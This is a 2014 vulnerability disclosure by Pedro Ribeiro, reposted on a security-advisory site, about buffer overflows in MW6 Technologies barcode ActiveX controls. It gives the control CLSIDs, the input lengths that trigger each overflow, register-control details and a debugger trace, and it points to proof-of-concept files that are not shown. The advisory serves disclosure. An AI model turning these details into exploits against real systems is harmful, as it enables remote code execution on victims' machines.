MW6 Technologies ActiveX buffer overflows and remote code execution

2014.01.22
Credit: Pedro Ribeiro
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Hi, MW6 Technologies (http://www.mw6tech.com/) is a manufacturer of barcoding software. Among their products they have ActiveX controls to process barcodes and labels. I discovered that their ActiveX controls have multiple buffer overflows, some of them leading to code execution. I informed them in November last year, and they responded to me basically saying that they don't care and won't fix it. I then asked CERT to try to persuade them, but even with CERT asking them they still didn't care. CERT released the vulnerability details yesterday at http://www.kb.cert.org/vuls/id/219470. In this post I will explain a bit better what the problem is and how it can be exploited. The excerpt below is from the original advisory sent to MW6. =========================================================================== Problem: The Data parameter is subject to a buffer overflow DEFINITELY leading to arbitrary code execution. COM Object - {2355C601-37D1-42B4-BEB1-03C773298DC8} MW6MaxiCode Class File Description : MaxiCode ActiveX File Version : 4, 0, 0, 1 To trigger the overflow enter a string larger than 4000 characters. In the PoC (mw6maxicode.html) you see that Internet Explorer crashes at trying to copy 42424242 to a register. By disassembling near the crash location, you can see that both EAX and ECX can be manipulated respectively with values 41414141 and 42424242. These are later used to write operations leading to an arbitrary 4 byte write. =========================================================================== Problem: The Data parameter is subject to a buffer overflow DEFINITELY leading to arbitrary code execution. COM Object - {F359732D-D020-40ED-83FF-F381EFE36B54} MW6Aztec Class File Description : Aztec ActiveX File Version : 4, 0, 0, 1 To trigger the overflow enter a string larger than 9000 characters. The attached PoC (mw6maztec.html) crashes when trying to read from address 41414141. Further investigation shows that the value of EAX 030e20d0 is written into an arbitrary memory location, and this EAX value is pointing to the Data buffer. =========================================================================== Problem: The Data parameter is subject to a buffer overflow PROBABLY leading to arbitrary code execution. COM Object - {DE7DA0B5-7D7B-4CEA-8739-65CF600D511E} MW6DataMatrix Class File Description : DataMatrix ActiveX File Version : 4, 0, 0, 1 To trigger the overflow enter a string larger than 10000 characters. This one I'm not 100% sure if I can control. The attached PoC (mw6datamatrix.html) dies with the following message: DATAMA_1!DllUnregisterServer+0xac5f: 02fbbcea 668984566c5c0100 mov word ptr [esi+edx*2+15C6Ch],ax ds:0023:03006000=???? The !exploitable windbg plugin says: Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at DATAMA_1!DllUnregisterServer+0x000000000000ac5f (Hash=0x3a50672d.0x5d486a2f) User mode write access violations that are not near NULL are exploitable. So the buffer overflow might be exploitable by someone willing to spend more time on this. =========================================================================== All of these PoC were tested in Internet Explorer 8 and Windows XP SP3. The PoC can be obtain from my repository at https://github.com/pedrib/PoC in the folder "mw6". Regards, Pedro Ribeiro Director of Research Agile Information Security

References:

http://seclists.org/fulldisclosure/2014/Jan/137
http://www.kb.cert.org/vuls/id/219470


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top